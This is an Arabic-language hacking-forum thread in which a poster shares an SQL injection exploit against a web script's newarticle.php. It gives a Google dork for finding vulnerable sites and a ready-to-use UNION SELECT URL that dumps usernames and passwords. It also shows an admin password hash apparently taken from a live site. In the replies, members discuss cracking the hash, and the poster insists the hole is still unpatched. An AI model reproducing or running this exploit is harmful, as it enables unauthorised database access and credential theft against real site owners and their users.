ثغرة أعلن عنها لأول مرة هنا في منتدى vbspiders

[soufhak]

بسم الله الرحمان الرحيم

السلام عليكم و رحمة الله و بركاته و بعد​

#​

Exploit Title : Sql Injection Vulnerability
# Date : 18-08-2010
# Author : soufhacker
# Version : All Versions

###############################################
Dork google: inurl:newarticle.php?id=
###############################################
Exploit:
http://site.com/path/newarticle.php?id=-805+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+access_all_areas.user--

###############################################
username : Admin
password : $1$V-s+pArA$T9V7JXDNeJ2AqiV9kfgCl/
Done!
#############soufhacker################​

 

[عبد الله ر]

يعطيك العافية على الثغرة
باقي نفك الهاش

 

[soufhak]

شكرا على مرورك الطيب أخي الكريم أما الهاش فقد فكيتوا لكن ماراح أحطوا إلا بعد ما أرا الجدية من الأعضاء

 

[GuEvArA511]

[align=center]الهاش وش نوعه ؟؟ اول مره اشوفه

**--**--**--**--**--**--**

السركبت هذا ألي فية 29 موقع مركبة وكلها مررررقعة’
[/align]

 

[soufhak]

شكرا على المرور لكن الثغرات ماهي مرقعة و جرب الثغرة راح تجدها صالحة بإذن الله أما نوع الهاش فهو MD5